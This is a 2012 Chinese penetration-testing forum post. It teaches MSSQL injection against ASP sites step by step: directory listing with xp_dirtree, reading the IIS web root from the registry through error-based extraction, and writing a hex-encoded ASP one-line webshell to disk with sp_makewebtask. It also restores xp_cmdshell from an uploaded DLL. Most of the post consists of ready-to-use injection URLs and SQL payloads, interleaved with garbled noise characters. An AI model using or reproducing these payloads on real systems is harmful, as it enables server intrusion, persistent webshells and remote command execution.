中国网络渗透测试联盟

标题: MSsqlL注入取得网站路径最好的方法 [打印本页]

作者: admin    时间: 2012-9-13 17:20
标题: MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
& U! W4 W0 G2 q假设我们在test里有两个文件夹test1和test2在test1里又有test3
; B! v7 Z6 C4 k6 y结果显示
' N/ l: f: U7 s( b  H
+ i: U+ l- m8 A+ D. O1 e7 i- x! A' Esubdirectory depth9 B; ~! x2 Q  V( W% q4 ?, }
test1 1
0 U$ J3 N3 Q6 \5 C2 p0 Stest3 27 K( {7 f" V+ a; f6 X. h0 c
test2 16 ~  _5 K9 K( |

3 J" J  ]( z* W, V哈哈发现没有那个depth就是目录的级数; h' N$ @) a7 w9 |% H( d
ok了,知道怎么办了吧
* S% _+ E% c3 f
% n0 y6 A8 m6 ^2 A) v$ ?http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- 3 D% x/ I/ F7 |3 z. u- J
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
* F0 z5 x* I' x! A6 }, b6 U  o  ^* Qhttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-: ~7 E! x! R- v

. J4 }  }0 N: J; }& K$ e( H只要加上id=1,就是第一级目录 。
1 H' g# j$ t. `1 V- g) p+ ~7 Z, }# y
" a) P9 T( l$ M4 O
通过注册表读网站路径:
2 U- r( c( V6 X4 K- _
* x3 S# P# P% F- q1.;create table [dbo].[cyfd] ([gyfd][char](255));
4 U6 R9 v. c" J, a; f) S; ~$ `* N2 D: T& r
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
3 T7 j( U2 S" K2 |id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--9 e3 D$ i7 T# t. B

$ \9 l3 r( d2 b9 ~3 x+ a' c  M3.and 1=(select count(*) from 临时表 where 临时字段名>1)
4 W. Z$ X6 Q2 _. U  N: B" ~2 c2 Zand 1=(select count(*) from cyfd where gyfd > 1) # `! o, b% {" _2 n$ V6 b3 L8 ^
这样IE报错,就把刚才插进去的Web路径的值报出来了
2 V; x* Q* m& u. g; r( R/ O
  L$ j2 \0 G0 ]& f' E4.drop table cyfd;-- 删除临时表$ m# x! ^8 e: i& H1 o5 @
! I  n. e  [- S2 |' M9 r5 p( F
获得webshell方法:1 X9 }% c, w2 n7 v  `# B
1.create table cmd (a image)-- \**cmd是创建的临时表
5 e0 C1 _$ s/ S9 ?+ f$ i. i7 I2 m$ E% U; [% L
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
" N: v; x1 W4 d0 w( z& {3 v6 \  x" s. `0 Z/ ^
4 w) ~4 y% t5 Y6 W+ q
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'3 Z- w8 D5 T3 W, M& p! X5 H1 m  O
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'2 O; i! ?8 r$ v. P1 D' A: V$ b
# [6 o/ C2 Z' w4 b/ k
4.drop table cmd;-- 删除cmd临时表
8 x/ M$ l# d+ p4 u4 A9 b: R; ^  Q& Q. W+ a; [# ~+ l8 z
恢复xp_cmdshell方法之一:
; M# y1 Q* R1 l. j0 ^6 Y. U我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:( @/ J& @) c' |1 o) g( S7 x
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
4 l9 D3 V  g& x2 b7 \) S6 ^5 O# i恢复,支持绝对路径的恢复哦。:)
4 I4 P) q, }/ @8 Z* }




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2